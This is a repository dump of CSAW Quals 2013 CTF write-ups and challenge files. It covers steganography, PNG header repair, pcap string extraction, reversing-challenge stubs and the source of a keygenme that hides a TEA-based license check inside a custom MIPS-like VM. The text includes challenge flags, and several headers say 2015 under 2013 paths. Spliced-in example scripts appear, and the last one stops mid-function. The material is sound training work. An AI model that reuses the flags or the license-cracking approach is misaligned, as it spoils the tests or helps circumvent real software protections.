/csaw-quals-2013/exploitation/scp-hack-500/solution.txt:
--------------------------------------------------------------------------------
1 | http://blog.dragonsector.pl/2013/09/csaw-ctf-quals-2013-scp-hack.html
2 |
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/black-and-white-100/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Black & White
2 |
3 | **Category:** Misc
4 | **Points:** 100
5 | **Solves:** 818
6 | **Description:**
7 |
8 | > [chal.png](chal.png)
9 |
10 | ## Write-up
11 |
12 | We are given a PNG that seems to be just white.
13 |
14 | However, using a steganography tool like [stegsolve](https://aur.archlinux.org/packages/stegsolve/), we see the flag in the blue, red or green 0 pane:
15 |
16 | 
17 |
18 | The flag is `key{forensics_is_fun}`.
19 |
20 | ## Other write-ups and resources
21 |
22 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/black-and-white-100/chal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/black-and-white-100/chal.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/black-and-white-100/key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/black-and-white-100/key.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/1.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/2.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/IMG_0707.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/IMG_0707.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: deeeeeeaaaaaadbeeeeeeeeeef
2 |
3 | **Category:** Misc
4 | **Points:** 200
5 | **Solves:** 224
6 | **Description:**
7 |
8 | > [IMG_0707.png](IMG_0707.png)
9 |
10 | ## Write-up
11 |
12 | We are given a corrupt PNG file:
13 |
14 | ```bash
15 | $ file IMG_0707.png
16 | IMG_0707.png: PNG image data, 3264 x 1681, 8-bit/color RGBA, non-interlaced
17 | $ pngcheck IMG_0707.png
18 | IMG_0707.png CRC error in chunk IHDR (computed fcc410a8, expected c1d0b3e4)
19 | ERROR: IMG_0707.png
20 | ```
21 |
22 | Editing the PNG's CRC in `hexedit` to the correct one yields a valid PNG:
23 |
24 | 
25 | 
26 | 
27 |
28 | However, the picture looks like it has been resized, given the unusual aspect ratio of `3264:1681 ~= 1.94:1`.
29 | Using `exiftool`, we see that the picture was taken with an iPhone 5:
30 |
31 | ```bash
32 | $ exiftool IMG_0707.png
33 | ExifTool Version Number : 9.76
34 | [...]
35 | Source : iPhone 5
36 | Software : 6.1.4
37 | [...]
38 | Image Size : 3264x1681
39 | ```
40 |
41 | The usual aspect ratio of a picture taken with an [iPhone 5 camera](http://en.wikipedia.org/wiki/IPhone#Screen_and_input) is around `16:9` or `4:3`, so we apply that ratio to the picture using `hexedit` and fix the resulting new CRC sum:
42 |
43 | 
44 | 
45 | ```bash
46 | $ pngcheck NEW.png
47 | NEW.png CRC error in chunk IHDR (computed f754da63, expected fcc410a8)
48 | ERROR: NEW.png
49 | ```
50 | 
51 | 
52 |
53 | The flag is `Key{TheISISPasswordIs}`.
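
When only the IHDR height has been lowered, the IDAT stream still holds every scanline, so the real height can be derived from its decompressed size instead of guessed from an aspect ratio. The Python script below is an added example, not part of the original write-up: it goes beyond the `hexedit` steps by computing the height, assumes the IHDR width is correct and the image is non-interlaced, and runs on a small constructed PNG rather than on `IMG_0707.png`.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
SAMPLES = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}  # colour type -> samples per pixel


def crc(ctype, data):
    """CRC-32 over chunk type + data, which is what a PNG chunk stores."""
    return zlib.crc32(ctype + data) & 0xFFFFFFFF


def chunk(ctype, data, stored_crc=None):
    """Serialise one chunk; stored_crc lets a chunk keep a stale CRC."""
    value = crc(ctype, data) if stored_crc is None else stored_crc
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", value)


def parse(png):
    """Return [(type, data, stored_crc)] for every chunk up to IEND."""
    if png[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    chunks, pos = [], 8
    while pos + 12 <= len(png):
        (length,) = struct.unpack_from(">I", png, pos)
        end = pos + 8 + length
        if end + 4 > len(png):
            raise ValueError("truncated chunk")
        ctype = png[pos + 4:pos + 8]
        (stored,) = struct.unpack_from(">I", png, end)
        chunks.append((ctype, png[pos + 8:end], stored))
        pos = end + 4
        if ctype == b"IEND":
            break
    if not chunks or chunks[0][0] != b"IHDR" or len(chunks[0][1]) != 13:
        raise ValueError("first chunk is not a 13-byte IHDR")
    return chunks


def crc_errors(png):
    """The pngcheck test: (chunk, computed, stored) for every mismatch."""
    return [(t.decode("latin-1"), crc(t, d), s)
            for t, d, s in parse(png) if crc(t, d) != s]


def dimensions(png):
    """(width, height) as declared in IHDR."""
    return struct.unpack(">II", parse(png)[0][1][:8])


def scanlines_in_idat(png):
    """Number of scanlines the pixel data really contains."""
    chunks = parse(png)
    width, _h, depth, ctype, _c, _f, interlace = struct.unpack(">IIBBBBB", chunks[0][1])
    if interlace:
        raise ValueError("interlaced images are not handled")
    stride = 1 + (width * SAMPLES[ctype] * depth + 7) // 8  # filter byte + row
    raw = zlib.decompress(b"".join(d for t, d, _ in chunks if t == b"IDAT"))
    rows, rest = divmod(len(raw), stride)
    if rest:
        raise ValueError("IDAT size does not fit the declared width")
    return rows


def repair(png):
    """Set the IHDR height to the real scanline count and recompute its CRC."""
    chunks = parse(png)
    ihdr = chunks[0][1]
    fixed = ihdr[:4] + struct.pack(">I", scanlines_in_idat(png)) + ihdr[8:]
    out = PNG_SIG + chunk(b"IHDR", fixed)
    for ctype, data, stored in chunks[1:]:
        out += chunk(ctype, data, stored)  # other chunks stay byte-for-byte
    return out


def constructed_sample():
    """Constructed 4x6 RGBA image whose IHDR claims 3 rows and has a stale CRC."""
    width, true_height, shown_height = 4, 6, 3
    raw = b"".join(b"\x00" + bytes([row * 40] * width * 4) for row in range(true_height))
    honest = struct.pack(">IIBBBBB", width, true_height, 8, 6, 0, 0, 0)
    cropped = struct.pack(">IIBBBBB", width, shown_height, 8, 6, 0, 0, 0)
    return (PNG_SIG + chunk(b"IHDR", cropped, stored_crc=crc(b"IHDR", honest))
            + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b""))


if __name__ == "__main__":
    sample = constructed_sample()
    for name, computed, stored in crc_errors(sample):
        print(f"CRC error in chunk {name} (computed {computed:08x}, expected {stored:08x})")
    fixed = repair(sample)
    print(dimensions(sample), "->", dimensions(fixed), "errors left:", crc_errors(fixed))
```
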
54 | ## Other write-ups and resources
55 |
56 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/crc_fixd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/crc_fixd.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/flag.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/resized_for_repo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/resized_for_repo.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/wxh_fixd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/wxh_fixd.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/wxh_orig.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/wxh_orig.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/life-300/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Life
2 |
3 | **Category:** Misc
4 | **Points:** 300
5 | **Solves:** 212
6 | **Description:**
7 |
8 | >
9 | >
10 | > nc 128.238.66.216 45678
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/life-300/source.txt:
--------------------------------------------------------------------------------
1 | Coming soon! Ping fuzyll if you need it sooner.
2 |
3 | fuzyll@fuzyll.com
4 |
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/network1-50/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Networking 1
2 |
3 | **Category:** Misc
4 | **Points:** 50
5 | **Solves:** 1004
6 | **Description:**
7 |
8 | > [networking.pcap](networking.pcap)
9 |
10 | ## Write-up
11 |
12 | We can find the flag in the tcpdump using `strings`:
13 |
14 | ```bash
15 | $ file networking.pcap
16 | networking.pcap: tcpdump capture file (little-endian) - version 2.4 (Ethernet, capture length 65535)
17 | $ strings -a networking.pcap | sort | uniq
18 |
19 | )&~
20 | 38400,38400
21 | Login incorrect
22 | Password:
23 | Ubuntu 12.04.2 LTS
24 | XTERM
25 | flag{d316759c281bf925d600be698a4973d5}
26 | hockeyinjune-virtual-machine login:
27 | ```
28 |
29 | The flag is `flag{d316759c281bf925d600be698a4973d5}`.
30 |
31 | ## Other write-ups and resources
32 |
33 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/network1-50/networking.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/network1-50/networking.pcap
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/network2-50/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Networking 2
2 |
3 | **Category:** Misc
4 | **Points:** 50
5 | **Solves:** 864
6 | **Description:**
7 |
8 | > [networking.pcap](networking.pcap)
9 | >
10 | > [networking.pcap.process](networking.pcap.process)
11 |
12 | ## Write-up
13 |
14 | We are given the same tcpdump as [network1-50](../network1-50/):
15 |
16 | ```bash
17 | $ diff networking.pcap ../network1-50/networking.pcap
18 | $ [...]
19 | ```
20 |
21 | However, we are also given a `networking.pcap.process` file, which contains the flag:
22 |
23 | ```bash
24 | $ strings -a networking.pcap.process | sort | uniq
25 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe
26 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe
27 |
28 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe!
29 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe"
30 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe$
31 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe%
32 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe'
33 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe(
34 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe*
35 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe+
36 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe-
37 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe/
38 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe0
39 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe1
40 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe2
41 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe3
42 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe5
43 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe7
44 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe8
45 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe:
46 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe;
47 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe<
48 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe=
49 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe?
50 | ```
51 |
52 | The flag is `flag{f9b43c9e9c05be5e08ea163007af5144}`.
53 |
54 | ## Other write-ups and resources
55 |
56 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/network2-50/networking.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/network2-50/networking.pcap
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/network2-50/networking.pcap.process:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/network2-50/networking.pcap.process
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/bikinibonanza-150/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: bikinibonanza
2 |
3 | **Category:** Reversing
4 | **Points:** 150
5 | **Solves:** 316
6 | **Description:**
7 |
8 | > [bikinibonanza.exe](bikinibonanza.exe)
9 | >
10 | > If your key isn't working PM ColdHeat on IRC
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/bikinibonanza-150/bikinibonanza.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/bikinibonanza-150/bikinibonanza.exe
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/crackme-300/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: crackme
2 |
3 | **Category:** Reversing
4 | **Points:** 300
5 | **Solves:** 174
6 | **Description:**
7 |
8 | > nc 128.238.66.218 54321
9 | >
10 | > [crackme](crackme)
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/crackme-300/crackme:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/crackme-300/crackme
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/csaw2013reversing1-100/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: CSAW Reversing 2013 1
2 |
3 | **Category:** Reversing
4 | **Points:** 100
5 | **Solves:** 644
6 | **Description:**
7 |
8 | > [csaw2013reversing1.exe](csaw2013reversing1.exe)
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/csaw2013reversing1-100/csaw2013reversing1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/csaw2013reversing1-100/csaw2013reversing1.exe
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/csaw2013reversing2-200/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: CSAW Reversing 2013 2
2 |
3 | **Category:** Reversing
4 | **Points:** 200
5 | **Solves:** 357
6 | **Description:**
7 |
8 | > [csaw2013reversing2.exe](csaw2013reversing2.exe)
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/csaw2013reversing2-200/csaw2013reversing2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/csaw2013reversing2-200/csaw2013reversing2.exe
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/dotnet-100/DotNetReversing.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/dotnet-100/DotNetReversing.exe
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/dotnet-100/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: DotNet
2 |
3 | **Category:** Reversing
4 | **Points:** 100
5 | **Solves:** 662
6 | **Description:**
7 |
8 | > [DotNetReversing.exe](DotNetReversing.exe)
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/impossible-500/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Impossible
2 |
3 | **Category:** Reversing
4 | **Points:** 500
5 | **Solves:** 82
6 | **Description:**
7 |
8 | > WTF, his hp is over 9000! Beat the game to get your key.
9 | >
10 | > [impossible.nds](impossible.nds)
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/impossible-500/impossible.nds:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/impossible-500/impossible.nds
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Keygenme
2 |
3 | **Category:** Reversing
4 | **Points:** 400
5 | **Solves:** 100
6 | **Description:**
7 |
8 | > nc 128.238.66.219 14549
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source.txt:
--------------------------------------------------------------------------------
1 | From: http://github.com/crowell/keygenme
2 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/README.md:
--------------------------------------------------------------------------------
1 | keygenme
2 | ========
3 |
4 | keygenme challenge from csaw ctf 2013
5 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/cpu.h:
--------------------------------------------------------------------------------
1 | #ifndef __CPU__
2 | #define __CPU__
3 | #include <string>
4 | #include "instruction.h"
5 | #define NUM_REG 32
6 | #define MEM_SIZE 8196
7 | class cpu
8 | {
9 | typedef unsigned int uint;
10 | typedef unsigned char uchar;
11 | public:
12 | cpu();
13 | cpu(std::string Code, std::string UserKey, std::string FullString);
14 | ~cpu();
15 | void Execute();
16 | uint GetT6();
17 | uint GetT7();
18 |
19 | private:
20 | uint R[NUM_REG]; //32
21 | uint Hi;
22 | uint Lo;
23 | uchar Memory[MEM_SIZE];
24 | uint Pc;
25 | instruction instr;
26 | std::string Code;
27 | std::string UserKey;
28 | uint hexval(char ch);
29 | uint hextoint(std::string hex);
30 | instruction interpretinstruction();
31 | void FillMemory(std::string UserKey, std::string FullString);
32 | };
33 | #endif
34 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/encrypt.asm:
--------------------------------------------------------------------------------
1 | add $t1, $zero, $zero# clear out $t1 ; 00004820
2 | addi $t1, $t1, 0x9e# TEA magic is 0x9e3779b9 ; 2129009E
3 | sll $t1, $t1, 8# shift out making room in the bottom 4; 00094a00
4 | addi $t1, $t1, 0x37 ; 21290037
5 | sll $t1, $t1, 8 ; 00094a00
6 | addi $t1, $t1, 0x79 ; 21290079
7 | sll $t1, $t1, 8 ; 00094a00
8 | addi $t1, $t1, 0xb9 # now $t1 holds the magic 0x9e3779b9 ; 212900b9
9 | add $t2, $zero, $zero# $t2 is the counter ; 00005020
10 | add $t0, $zero, $zero# $t0 is the sum ; 00004020
11 | lw $t8, $zero, 8# k0 mem[8-23] = k ; 8c180008
12 | lw $s7, $zero, 12# k1 ; 8C17000C
13 | lw $s6, $zero, 16# k2 ; 8C160010
14 | lw $t3, $zero, 20# k3 now our keys are in registers ; 8c0b0014
15 | lw $t7, $zero, 0# v0 mem[0-7] = v ; 8c0f0000
16 | lw $t6, $zero, 4# v1, our plaintext is in the registers ; 8c0e0004
17 | loop: add $t0, $t0, $t1# sum+=delta ; 01094020
18 | sll $s4, $t6, 4# (v1 << 4) ; 000ea100
19 | add $s4, $s4, $t8# +k0 part 1 is in s4 ; 0298a020
20 | add $s3, $t6, $t0# (v1 + sum) part 2 is in s3 ; 01c89820
21 | srl $s2, $t6, 5# (v1 >> 5) ; 000e9142
22 | add $s2, $s2, $s7# +k1, now do the xors part 3 in s2 ; 02579020
23 | xor $s1, $s2, $s3# xor 2 and 3 parts ; 02728826
24 | xor $s1, $s1, $s4# xor 1(2,3) ; 02348826
25 | add $t7, $t7, $s1# done with line 2 of the tea loop ; 01f17820
26 | sll $s4, $t7, 4# (v0 << 4) ; 000fa100
27 | add $s4, $s4, $s6# +k2 part 1 in s4 ; 0296a020
28 | add $s3, $t7, $t0# (v0 + sum) part 2 in s3 ; 01e89820
29 | srl $s2, $t7, 5# (v0 >> 5) ; 000f9142
30 | add $s2, $s2, $t3# +k3 part 3 in s2 ; 024b9020
31 | xor $s1, $s2, $s3# xor 2 and 3 parts ; 02728826
32 | xor $s1, $s1, $s4# xor 1(2,3) ; 02348826
33 | add $t6, $t6, $s1# done with line 3 of the tea loop ; 01d17020
34 | addi $s0, $zero, 32# for compare ; 20100020
35 | addi $t2, $t2, 1# the counter ; 214a0001
36 | bne $t2, $s0, 17# bne loop, now save back to the memory ; 15500010
37 | ; here t6 and t7 are the two values we need :-)
38 |
39 |
40 |
41 | 00004820
42 | 2129009E
43 | 00094a00
44 | 21290037
45 | 00094a00
46 | 21290079
47 | 00094a00
48 | 212900b9
49 | 00005020
50 | 00004020
51 | 8c180008
52 | 8C17000C
53 | 8C160010
54 | 8c0b0014
55 | 8c0f0000
56 | 8c0e0004
57 | 01094020
58 | 000ea100
59 | 0298a020
60 | 01c89820
61 | 000e9142
62 | 02579020
63 | 02728826
64 | 02348826
65 | 01f17820
66 | 000fa100
67 | 0296a020
68 | 01e89820
69 | 000f9142
70 | 024b9020
71 | 02728826
72 | 02348826
73 | 01d17020
74 | 20100020
75 | 214a0001
76 | 15500010
77 |
78 | 000048202129009E00094a002129003700094a002129007900094a00212900b900005020000040208c1800088C17000C8C1600108c0b00148c0f00008c0e000401094020000ea1000298a02001c89820000e914202579020027288260234882601f17820000fa1000296a02001e89820000f9142024b9020027288260234882601d1702020100020214a000115500010
79 |
80 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/instruction.cpp:
--------------------------------------------------------------------------------
1 | #include "instruction.h"
2 |
3 | instruction::instruction()
4 | {
5 | }
6 |
7 | instruction::instruction(uint opcode, uint rs, uint rt, uint rd, uint immediate,
8 | uint shift, uint funct, uint address)
9 | {
10 | this->opcode = opcode;
11 | this->rs = rs;
12 | this->rt = rt;
13 | this->rd = rd;
14 | this->immediate = immediate;
15 | this->shift = shift;
16 | this->funct = funct;
17 | this->address = address;
18 | }
19 |
20 | instruction::~instruction()
21 | {
22 | }
23 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/instruction.h:
--------------------------------------------------------------------------------
1 | #ifndef __INSTRUCTION__
2 | #define __INSTRUCTION__
3 | #include <string>
4 |
5 | class instruction
6 | {
7 | typedef unsigned int uint;
8 | public:
9 | instruction();
10 | instruction(uint opcode, uint rs, uint rt, uint rd, uint immediate,
11 | uint shift,uint funct, uint address);
12 | ~instruction();
13 | uint opcode;
14 | uint rs;
15 | uint rt;
16 | uint rd;
17 | uint immediate;
18 | uint shift;
19 | uint funct;
20 | uint address;
21 | };
22 |
23 | #endif
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/keygenme.cpp:
--------------------------------------------------------------------------------
1 | #include <iostream>
2 | #include <cstring>
3 | #include <cstdlib>
4 | #include "cpu.h"
5 | using namespace std;
6 | typedef unsigned int uint;
7 | typedef unsigned char uchar;
8 | void printusage(char*);
9 | void printconstraints(char*);
10 | bool check(int, int, int, int);
11 | int main(int argc, char** argv)
12 | {
13 | if(argc < 4)
14 | {
15 | printusage(argv[0]);
16 | exit(1);
17 | }
18 | int namelen = strlen(argv[1]);
19 | if(namelen < 16)
20 | {
21 | printconstraints(argv[1]);
22 | exit(1);
23 | }
24 | int tok1 = strtoul(argv[2], NULL, 0);
25 | int tok2 = strtoul(argv[3], NULL, 0);
26 | std::string username(argv[1]);
27 | std::string fullkey = std::string(username.rbegin(), username.rend());
28 | cpu* libdrm = new cpu("000048202129009E00094a002129003700094a002129007900094a00212900b900005020000040208c1800088C17000C8C1600108c0b00148c0f00008c0e000401094020000ea1000298a02001c89820000e914202579020027288260234882601f17820000fa1000296a02001e89820000f9142024b9020027288260234882601d1702020100020214a000115500010", username, fullkey);
29 | libdrm->Execute();
30 | uint t6 = libdrm->GetT6();
31 | uint t7 = libdrm->GetT7();
32 | delete libdrm;
33 | if(check(t6, t7, tok1, tok2))
34 | {
35 | std::cout << "*<:-)" << std::endl;
36 | }
37 | else
38 | {
39 | std::cout << ":-(" << std::endl;
40 | }
41 | return 0;
42 | }
43 |
44 | bool check(int t6, int t7, int tok1, int tok2)
45 | {
46 | uint temp1 = tok1 ^ 0x31333337;
47 | uchar ch1 = ((tok2 & 0xFF000000) >> 24);
48 | uchar ch2 = ((tok2 & 0x00FF0000) >> 16);
49 | uchar ch3 = ((tok2 & 0x0000FF00) >> 8);
50 | uchar ch4 = (tok2 & 0x000000FF);
51 | uint temp2 = ch2 << 24;
52 | temp2 |= (ch3 << 16);
53 | temp2 |= (ch1 << 8);
54 | temp2 |= (ch4);
55 | if(t6 == temp1 && t7 == temp2)
56 | {
57 | return true;
58 | }
59 | return false;
60 | }
61 |
62 | void printusage(char* progname)
63 | {
64 | std::cout << "usage: " << progname << " " << std::endl;
65 | }
66 |
67 | void printconstraints(char* username)
68 | {
69 | std::cout << "error: " << username << " is not a valid username" << std::endl;
70 | }
71 |
72 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/description.txt:
--------------------------------------------------------------------------------
1 | Reversing : keygenme
2 |
3 | someone has leaked a binary from an activation server.
4 | can you crack the keygen algorithm for me?
5 |
6 | using the ELF provided, reverse the keygeneration algorithm.
7 | The server listening at raxcity.com on port 2000 will ask you for
8 | the passwords of various usernames. If you can provide 10 passwords, you might get a nice flag :-)
9 |
10 | *hint*
11 | Rumor has it that the actual keygen runs in a custom vm. I'd start by decoding the instruction format.
12 |
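
Following the hint about decoding the instruction format: the 32-bit words listed in `encrypt.asm` above are consistent with the standard MIPS R-type/I-type field layout, so shifts and masks recover the listing, and evaluating the first eight words yields the constant that identifies the cipher. This Python script is an added example, not part of the challenge source; the field layout, register names and the `add`/`addi`/`sll` semantics are assumed to be standard MIPS, and the operand order of the printed text follows the listing.

```python
# The 36 instruction words, copied from encrypt.asm on this page.
WORDS = """
00004820 2129009E 00094a00 21290037 00094a00 21290079 00094a00 212900b9
00005020 00004020 8c180008 8C17000C 8C160010 8c0b0014 8c0f0000 8c0e0004
01094020 000ea100 0298a020 01c89820 000e9142 02579020 02728826 02348826
01f17820 000fa100 0296a020 01e89820 000f9142 024b9020 02728826 02348826
01d17020 20100020 214a0001 15500010
""".split()

REGS = ("$zero $at $v0 $v1 $a0 $a1 $a2 $a3 $t0 $t1 $t2 $t3 $t4 $t5 $t6 $t7 "
        "$s0 $s1 $s2 $s3 $s4 $s5 $s6 $s7 $t8 $t9 $k0 $k1 $gp $sp $fp $ra").split()
R_TYPE = {0x20: "add", 0x26: "xor", 0x00: "sll", 0x02: "srl"}  # keyed by funct
I_TYPE = {0x08: "addi", 0x23: "lw", 0x05: "bne"}               # keyed by opcode


def fields(word):
    """Split a 32-bit word into the MIPS bit fields (assumed layout)."""
    return {
        "opcode": word >> 26,
        "rs": (word >> 21) & 31,
        "rt": (word >> 16) & 31,
        "rd": (word >> 11) & 31,
        "shamt": (word >> 6) & 31,
        "funct": word & 63,
        "imm": word & 0xFFFF,
    }


def disassemble(word):
    """Render one word in the operand order used by the encrypt.asm listing."""
    f = fields(word)
    rs, rt, rd = REGS[f["rs"]], REGS[f["rt"]], REGS[f["rd"]]
    if f["opcode"] == 0:
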